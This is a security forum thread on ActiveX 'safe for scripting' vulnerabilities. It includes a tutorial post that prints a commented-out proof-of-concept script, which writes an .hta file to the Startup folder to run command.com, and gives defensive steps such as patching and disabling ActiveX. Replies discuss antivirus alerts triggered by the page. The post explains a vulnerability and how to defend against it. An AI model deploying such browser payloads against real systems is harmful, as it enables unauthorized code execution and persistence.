Page 1 of 3 123 LastLast
Results 1 to 10 of 22

Thread: ActiveX - a boon or a bane?

  1. #1
    Member
    Join Date
    Nov 2003
    Posts
    33

    Post ActiveX - a boon or a a bane?

    Its been quite some time since I visited this site. Well... Its now or never. Time to make a comeback with a little tute.

    Lets get to the point....

    Most of us here know ActiveX, the OLE (Object Linking and Embedding) scripting for Internet Browsers. But can anyone think of a way with which you can hijack data? Well let me introduce you to the sins of ActiveX.

    let me just introduce you to ActiveX first. The main function of the ActiveX that makes it vulnerable is the its capability of client side execution. ActiveX and Java are two of a very few languages that use client side execution.

    This is how ActiveX works. The ActiveX controls have extensions of .ocx (Exept those written in Java). These objects are embedded into the browser using the <object> tag. This tag specifies the usage(properties) of the control and also the location of the control on the internet. When the user visits the web page with ActiveX controls, the browser first checks if the control is already in the registry. If not it'll download the script. Then it executes it and oh before execution it checks for Authenticode(Coming up). By default they the controls are downloaded into \windows\occache directory. This is where the fun begins, breaking the browser's security and hopping the Authenticode hurdle.

    Microsoft'sAthenticode Paradigm permits scripts to be executed. This is done with a cryptographic mechanisms which involves the browser and a 3rd party (usually VeriSign).

    Lets begin with the bugs. Yeah Yeah. I'm sorry to bug you with the boring part. But Hey, its Over.

    ActiveX "Safe for Scripting Issue"

    ActiveX controls usually are harmless functions. But scripts like scriptlet and Eyedog are rather irritating. scriptlet has the capablility to sneak into the local filesystem of the user and it can also create, edit and overwrite files. Eyedog can look into your registry.
    Using these two functions, One can create Armagaddon(I've obviously splelled it wrong).

    This safe for scripting issue was released by George Guininsky in 1999. If you want a taste of this script visit http://www.guininsky.com/scrtlb.html . When I mean a taste of the code I MEAN a taste of the code. Anyway, what the code does is very simple. The code creates a .hta file in the start up folder of the start menu. So every time you restart the comp, a message pops up . The code goes something like this:

    Code:
    //<object id="scr" classid="clsid:06290BDS-48AA-11D2-8432-006008C3FBFC">
    //</object>
    
    //<SCRIPT>
    //scr.reset();
    //scr.path="C:\\windows\\Start Mnu\\Programs\\StartUp\\guiniski.hta";
    //scr.doc="<object id='wsh' clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>
    //</object>
    //<SCRIPT>
    //alert('Written by George Guininski');
    //wsh.run('C:\\command.com');
    //</"+"SCRIPT>;
    //scr.write();
    //</SCRIPT>
    //</object>
    Registered ActiveX controls can be marked as "Sae for Scripting" either by implementing IDObjectSafety within the control or by marking them as safe in the registry by adding the key 7DD95801-9882-11CF-9FA9-00AA006C42C4 TO to the implemented cateories of the control.

    Can you just imagine how many such applications your system uses actively.
    Goto Start->Run->dcomcnfg
    You'll just be shocked seeing the amount of Active controls.

    Remember the Eyedog function is only vulnerable if youre using Office 2k. I suppose it has been rectified in XP.

    Avoiding the safe for scripting Issue:

    Three measures are to be taken in order to protect yourself:

    Step 1:

    Get relevant patches for Scriptlet/EyeDog from http://www.microsoft.com/technet/sec...n/ms99-032.asp
    and http://www.office.microsoft.com/down.../Uactlsec.aspx Respectively.
    But these patches do not provide pretection for "accidental Trojans". "accidental Trojans" are nothin but loopholes not yet found.

    Step 2:

    Change the settings of Macros security level in all the the office apps (There is no global setting) to Maximum
    Tools | Macro | Security in office 2k.

    Step 3:

    This is the most prominent and desperate step you can take. If you dont want to use activeX at all, just disable it.
    Tools | Internet Options | Security | Custom Lvel | Disable Macros.
    As simple as that. And no more ActiveX attacks.

    Man I'm beat. I never 1 vulnerability would take this much. I've got a few more to go. Maybe some other time.
    Till then, Saionara
    There are 10 kinds people on Earth.
    Those who know Binary and those who dont.

    [flip]4675636B207468652064616D6E20626C6F6F6479206861636B65642D757020776F726C6400[/flip]

  2. #2
    Very, VERY nicley written and explained. This is a solid proof-of-theory paper, in which I did learn a thing or two from, and applaud your efforts. Sometimes it takes a good slap in the face to show people the vunerabilities avaliable without proper security measures in place.

    Best of all, you included three basic "quick-fixes" and that's a good sight to see on these forums. An problem explained followed by an explaination.

  3. #3
    Senior Member
    Join Date
    Mar 2004
    Posts
    139

    Wow, my AV is going nuts on this page...
    could some one explain...doesn't like some sort of .php script.

    Nice info...

  4. #4
    Member
    Join Date
    Nov 2003
    Posts
    33
    Thanx guys.
    And I didn't quite understand your question
    There are 10 kinds people on Earth.
    Those who know Binary and those who dont.

    [flip]4675636B207468652064616D6E20626C6F6F6479206861636B65642D757020776F726C6400[/flip]

  5. #5
    Senior Member
    Join Date
    Mar 2004
    Posts
    139

    The code in the post must be active, or at least my AV is reacting to it.
    I think the best way to present code like that on a post is to place comment
    tags in front of each line, ie.//<Script> ...//scr.reset() ; ...at least its like that in javascript,
    and the browser will ignore it. Another one of the possible ways to include nastiness. Surprised the forum let this one ride.

  6. #6
    Senior Member
    Join Date
    Aug 2001
    Posts
    485
    Originally posted here by bluthund

    Wow, my AV is going nuts on this page...
    could some one explain...doesn't like some sort of .php script.

    Nice info...
    Yes, mine went ballistic as well, and I don't even have ActiveX enabled !!

    I'm pretty sure it is just picking up on the dodgy code embedded in the original post, though.
    AV scanners are getting more intelligent, and do pick up on a lot of these things, regardless of whether ActiveX is enabled or not.

    After all, the AV scanner can't be sure whether or not this code is about to be executed !!

    EDIT: In my case (McAfee) it was flagged as a potentially unsafe script, which is quite correct!!

  7. #7
    Member
    Join Date
    Nov 2003
    Posts
    33
    Yeah, I already marked it with commenting uesterday itself.
    Does it still react?
    There are 10 kinds people on Earth.
    Those who know Binary and those who dont.

    [flip]4675636B207468652064616D6E20626C6F6F6479206861636B65642D757020776F726C6400[/flip]

  8. #8
    Senior Member
    Join Date
    Aug 2001
    Posts
    485
    Yes, it does still react.

    Technically what you could describe as a false positive, but I'd far rather I had one or two of those, instead of letting something screw my system.

    Your post obviously isn't going to cause any browsers a problem - it's when the AV scanner itself looks at the web page that it gets suspicious. I suspect the issue is that it doesn't realise the code is commented out, but quite correctly doesn't like the look of it in case it is about to be executed.

    Nice post btw, but you have to try a bit harder to trick most AV scanners.

  9. #9
    Finally, a good explanation on a subject that ive been concerned about. Thank you, thank you, thank you.
    severe limitation

  10. #10
    Member
    Join Date
    Nov 2003
    Posts
    33
    Anytime pal, but what why so concerened abt this topic
    There are 10 kinds people on Earth.
    Those who know Binary and those who dont.

    [flip]4675636B207468652064616D6E20626C6F6F6479206861636B65642D757020776F726C6400[/flip]

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •